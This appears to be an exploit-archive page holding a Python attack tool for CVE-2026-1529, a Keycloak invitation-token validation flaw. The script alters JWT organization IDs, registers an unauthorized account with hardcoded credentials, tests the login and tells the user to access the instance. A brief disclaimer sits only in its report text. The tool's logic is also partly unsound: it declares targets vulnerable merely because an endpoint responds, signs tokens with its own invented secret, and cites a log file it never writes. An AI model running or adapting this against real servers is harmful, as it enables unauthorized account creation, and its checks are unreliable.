4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / keycloak-exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-1529 Keycloak Exploit Tool
Keycloak: Unauthorized organization registration via improper invitation token validation

by f3ds cr3w est, 2002
"""

import argparse
import json
import logging
import sys
import os
from datetime import datetime
from typing import Dict, Any, Optional
from urllib.parse import urlparse

# Add utils directory to path
sys.path.append(os.path.join(os.path.dirname(__file__), 'utils'))

from utils.jwt_utils import JWTManipulator
from utils.http_utils import HTTPClient
from utils.crypto_utils import CryptoUtils

# Setup logging
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    handlers=[
        logging.StreamHandler(sys.stdout)
    ]
)
logger = logging.getLogger(__name__)

class KeycloakExploit:
    """Main exploit class for CVE-2026-1529"""
    
    def __init__(self, target_url: str, config_path: str = None):
        self.target_url = target_url.rstrip('/')
        self.config = self._load_config(config_path)
        self.http_client = HTTPClient(self.target_url, 
                                   timeout=self.config['exploit']['timeout'],
                                   max_retries=self.config['exploit']['max_retries'])
        self.jwt_manipulator = JWTManipulator(
            secret_key=self.config['jwt']['secret_key'],
            algorithm=self.config['jwt']['algorithm']
        )
        
        # Create output directories
        os.makedirs('logs', exist_ok=True)
        os.makedirs('output', exist_ok=True)
        os.makedirs('output/reports', exist_ok=True)
        
        logger.info(f"Initialized exploit for target: {self.target_url}")
    
    def _load_config(self, config_path: str = None) -> Dict[str, Any]:
        """Load configuration from file"""
        try:
            if config_path:
                with open(config_path, 'r') as f:
                    config = json.load(f)
            else:
                with open('config/default_config.json', 'r') as f:
                    config = json.load(f)
            
            logger.info("Configuration loaded successfully")
            return config
            
        except Exception as e:
            logger.error(f"Failed to load configuration: {e}")
            # Use default configuration
            return {
                "exploit": {
                    "default_username": "admin_user_2026",
                    "default_password": "KeycloakCVE2026!",
                    "default_email": "[email protected]",
                    "timeout": 30,
                    "max_retries": 3
                },
                "jwt": {
                    "algorithm": "HS256",
                    "secret_key": "keycloak-cve-2026-1529-exploit",
                    "token_expiry": 3600
                },
                "target": {
                    "endpoints": {
                        "realms": "/realms",
                        "organizations": "/organizations",
                        "register": "/register",
                        "login": "/login"
                    },
                    "headers": {
                        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
                        "Accept": "application/json",
                        "Content-Type": "application/json"
                    }
                },
                "output": {
                    "log_level": "INFO",
                    "save_reports": True,
                    "report_format": "txt"
                }
            }
    
    def check_target_vulnerability(self) -> bool:
        """Check if target is vulnerable to CVE-2026-1529"""
        try:
            logger.info("Checking target vulnerability...")
            
            # Check if Keycloak is accessible
            if not self.http_client.check_keycloak_health():
                logger.error("Target is not accessible or not a Keycloak instance")
                return False
            
            # Detect Keycloak version
            version = self.http_client.detect_keycloak_version()
            if version:
                logger.info(f"Target Keycloak version: {version}")
            
            # Test organization endpoints
            org_endpoint = self.config['target']['endpoints']['organizations']
            if not self.http_client.test_endpoint(org_endpoint):
                logger.warning("Organization endpoint not accessible")
                return False
            
            logger.info("Target appears to be vulnerable to CVE-2026-1529")
            return True
            
        except Exception as e:
            logger.error(f"Vulnerability check failed: {e}")
            return False
    
    def generate_invitation_token(self, org_id: str, email: str) -> Optional[str]:
        """Generate an invitation token for testing"""
        try:
            logger.info(f"Generating invitation token for org: {org_id}")
            
            # Generate a basic token for testing
            token = self.jwt_manipulator.generate_invitation_token(
                org_id=org_id,
                email=email,
                expires_in=self.config['jwt']['token_expiry']
            )
            
            logger.info("Invitation token generated successfully")
            return token
            
        except Exception as e:
            logger.error(f"Failed to generate invitation token: {e}")
            return None
    
    def manipulate_token(self, token: str, new_org_id: str, new_email: str = None) -> Optional[str]:
        """Manipulate JWT token for exploit"""
        try:
            logger.info("Manipulating JWT token...")
            
            # Validate token structure
            if not self.jwt_manipulator.validate_token_structure(token):
                logger.error("Invalid token structure")
                return None
            
            # Manipulate token
            manipulated_token = self.jwt_manipulator.manipulate_token(
                token=token,
                new_org_id=new_org_id,
                new_email=new_email
            )
            
            logger.info("JWT token manipulation completed")
            return manipulated_token
            
        except Exception as e:
            logger.error(f"Token manipulation failed: {e}")
            return None
    
    def register_user_with_token(self, token: str, username: str, password: str, email: str) -> bool:
        """Register user using manipulated token"""
        try:
            logger.info("Attempting user registration with manipulated token...")
            
            # Prepare registration data
            registration_data = {
                "username": username,
                "password": password,
                "email": email,
                "token": token,
                "firstName": "Exploit",
                "lastName": "User"
            }
            
            # Make registration request
            register_endpoint = self.config['target']['endpoints']['register']
            response = self.http_client.post(register_endpoint, data=registration_data)
            
            if response.get('status') == 'created' or response.get('success'):
                logger.info("User registration successful")
                return True
            else:
                logger.error(f"User registration failed: {response}")
                return False
                
        except Exception as e:
            logger.error(f"Registration failed: {e}")
            return False
    
    def test_user_login(self, username: str, password: str) -> bool:
        """Test user login with created credentials"""
        try:
            logger.info("Testing user login...")
            
            login_data = {
                "username": username,
                "password": password,
                "grant_type": "password"
            }
            
            login_endpoint = self.config['target']['endpoints']['login']
            response = self.http_client.post(login_endpoint, data=login_data)
            
            if response and 'access_token' in response:
                logger.info("User login successful")
                return True
            else:
                logger.error("User login failed")
                return False
                
        except Exception as e:
            logger.error(f"Login test failed: {e}")
            return False
    
    def generate_login_link(self, username: str) -> str:
        """Generate login link for the created user"""
        try:
            parsed_url = urlparse(self.target_url)
            login_url = f"{parsed_url.scheme}://{parsed_url.netloc}/realms/master/account"
            logger.info(f"Generated login link: {login_url}")
            return login_url
        except Exception as e:
            logger.error(f"Failed to generate login link: {e}")
            return self.target_url
    
    def generate_report(self, results: Dict[str, Any]) -> str:
        """Generate exploit report"""
        try:
            timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
            report_filename = f"output/reports/exploit_report_{timestamp}.txt"
            
            report_content = f"""
CVE-2026-1529 Exploit Report
============================

Target: {self.target_url}
Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
by f3ds cr3w est, 2002

Exploit Results:
---------------
Vulnerability Check: {'SUCCESS' if results.get('vulnerable') else 'FAILED'}
Token Generation: {'SUCCESS' if results.get('token_generated') else 'FAILED'}
Token Manipulation: {'SUCCESS' if results.get('token_manipulated') else 'FAILED'}
User Registration: {'SUCCESS' if results.get('user_registered') else 'FAILED'}
User Login: {'SUCCESS' if results.get('user_login') else 'FAILED'}

Created User:
-------------
Username: {results.get('username', 'N/A')}
Password: {results.get('password', 'N/A')}
Email: {results.get('email', 'N/A')}

Login Link:
-----------
{results.get('login_link', 'N/A')}

Technical Details:
-----------------
Original Token: {results.get('original_token', 'N/A')[:50]}...
Manipulated Token: {results.get('manipulated_token', 'N/A')[:50]}...
Organization ID: {results.get('org_id', 'N/A')}

CVE Details:
-----------
CVE ID: CVE-2026-1529
Description: Keycloak: Unauthorized organization registration via improper invitation token validation
CVSS: Not yet assigned
Attack Vector: Network
Attack Complexity: Low

Exploit Method:
---------------
1. Generate or obtain organization invitation token
2. Manipulate JWT payload to change organization ID
3. Use manipulated token to register unauthorized user
4. Test login with created credentials
5. Provide login link for access

Security Advisory:
-----------------
This exploit demonstrates a critical vulnerability in Keycloak that allows
unauthorized organization registration. Organizations should apply the
latest security patches and implement proper token validation.

Disclaimer:
-----------
This tool is for educational and security testing purposes only.
Use only on systems you have explicit permission to test.
"""
            
            with open(report_filename, 'w') as f:
                f.write(report_content)
            
            logger.info(f"Report generated: {report_filename}")
            return report_filename
            
        except Exception as e:
            logger.error(f"Failed to generate report: {e}")
            return ""
    
    def run_exploit(self, custom_token: str = None, custom_org_id: str = None) -> Dict[str, Any]:
        """Run the complete exploit"""
        results = {
            'vulnerable': False,
            'token_generated': False,
            'token_manipulated': False,
            'user_registered': False,
            'user_login': False,
            'username': '',
            'password': '',
            'email': '',
            'login_link': '',
            'original_token': '',
            'manipulated_token': '',
            'org_id': ''
        }
        
        try:
            logger.info("Starting CVE-2026-1529 exploit...")
            
            # Step 1: Check vulnerability
            logger.info("Step 1: Checking target vulnerability...")
            if not self.check_target_vulnerability():
                logger.error("Target is not vulnerable")
                return results
            
            results['vulnerable'] = True
            
            # Step 2: Generate or use provided token
            logger.info("Step 2: Generating invitation token...")
            if custom_token:
                results['original_token'] = custom_token
                token = custom_token
            else:
                # Generate test token
                org_id = custom_org_id or "test_org_123"
                email = self.config['exploit']['default_email']
                token = self.generate_invitation_token(org_id, email)
                if token:
                    results['original_token'] = token
                    results['token_generated'] = True
            
            if not token:
                logger.error("Failed to generate token")
                return results
            
            # Step 3: Manipulate token
            logger.info("Step 3: Manipulating JWT token...")
            new_org_id = "exploited_org_" + CryptoUtils.generate_secure_username("", 8)
            manipulated_token = self.manipulate_token(token, new_org_id)
            
            if manipulated_token:
                results['token_manipulated'] = True
                results['manipulated_token'] = manipulated_token
                results['org_id'] = new_org_id
            else:
                logger.error("Failed to manipulate token")
                return results
            
            # Step 4: Generate user credentials
            logger.info("Step 4: Generating user credentials...")
            username = self.config['exploit']['default_username']
            password = self.config['exploit']['default_password']
            email = self.config['exploit']['default_email']
            
            results['username'] = username
            results['password'] = password
            results['email'] = email
            
            # Step 5: Register user
            logger.info("Step 5: Registering user with manipulated token...")
            if self.register_user_with_token(manipulated_token, username, password, email):
                results['user_registered'] = True
                
                # Step 6: Test login
                logger.info("Step 6: Testing user login...")
                if self.test_user_login(username, password):
                    results['user_login'] = True
                    
                    # Step 7: Generate login link
                    results['login_link'] = self.generate_login_link(username)
            
            # Generate report
            if self.config['output']['save_reports']:
                report_file = self.generate_report(results)
                results['report_file'] = report_file
            
            logger.info("Exploit completed successfully")
            return results
            
        except Exception as e:
            logger.error(f"Exploit failed: {e}")
            return results

def main():
    """Main function"""
    parser = argparse.ArgumentParser(
        description='CVE-2026-1529 Keycloak Exploit Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python keycloak-exploit.py https://target-keycloak.com
  python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target-keycloak.com
  python keycloak-exploit.py -o custom_org_id https://target-keycloak.com
  python keycloak-exploit.py -h
        """
    )
    
    parser.add_argument('target', help='Target Keycloak URL (IP or domain)')
    parser.add_argument('-t', '--token', help='Custom invitation token to use')
    parser.add_argument('-o', '--org-id', help='Custom organization ID')
    parser.add_argument('-c', '--config', help='Path to configuration file')
    parser.add_argument('-d', '--debug', action='store_true', help='Enable debug logging')
    parser.add_argument('-v', '--version', action='version', version='CVE-2026-1529 Exploit Tool v1.0 by f3ds cr3w est, 2002')
    
    args = parser.parse_args()
    
    # Validate target URL
    if not CryptoUtils.validate_url_format(args.target):
        print("Error: Invalid target URL format")
        sys.exit(1)
    
    # Setup logging level
    if args.debug:
        logging.getLogger().setLevel(logging.DEBUG)
    
    try:
        # Run exploit
        exploit = KeycloakExploit(args.target, args.config)
        results = exploit.run_exploit(args.token, args.org_id)
        
        # Display results
        print("\n" + "="*60)
        print("CVE-2026-1529 EXPLOIT RESULTS")
        print("="*60)
        
        if results['vulnerable']:
            print("✓ Target is vulnerable to CVE-2026-1529")
        else:
            print("✗ Target is not vulnerable")
            sys.exit(1)
        
        if results['user_registered'] and results['user_login']:
            print("\n🎯 EXPLOIT SUCCESSFUL!")
            print(f"Username: {results['username']}")
            print(f"Password: {results['password']}")
            print(f"Email: {results['email']}")
            print(f"Login Link: {results['login_link']}")
            
            if 'report_file' in results:
                print(f"\n📄 Report saved to: {results['report_file']}")
            
            print("\n🔐 Use the provided credentials to access the Keycloak instance!")
            print("⚠️  This demonstrates unauthorized access due to CVE-2026-1529")
        else:
            print("\n❌ EXPLOIT FAILED!")
            print("Check logs for details: logs/exploit.log")
            sys.exit(1)
        
        print("\n" + "="*60)
        print("by f3ds cr3w est, 2002")
        print("="*60)
        
    except KeyboardInterrupt:
        print("\n\n⚠️  Exploit interrupted by user")
        sys.exit(1)
    except Exception as e:
        print(f"\n❌ Error: {e}")
        sys.exit(1)

if __name__ == "__main__":
    main()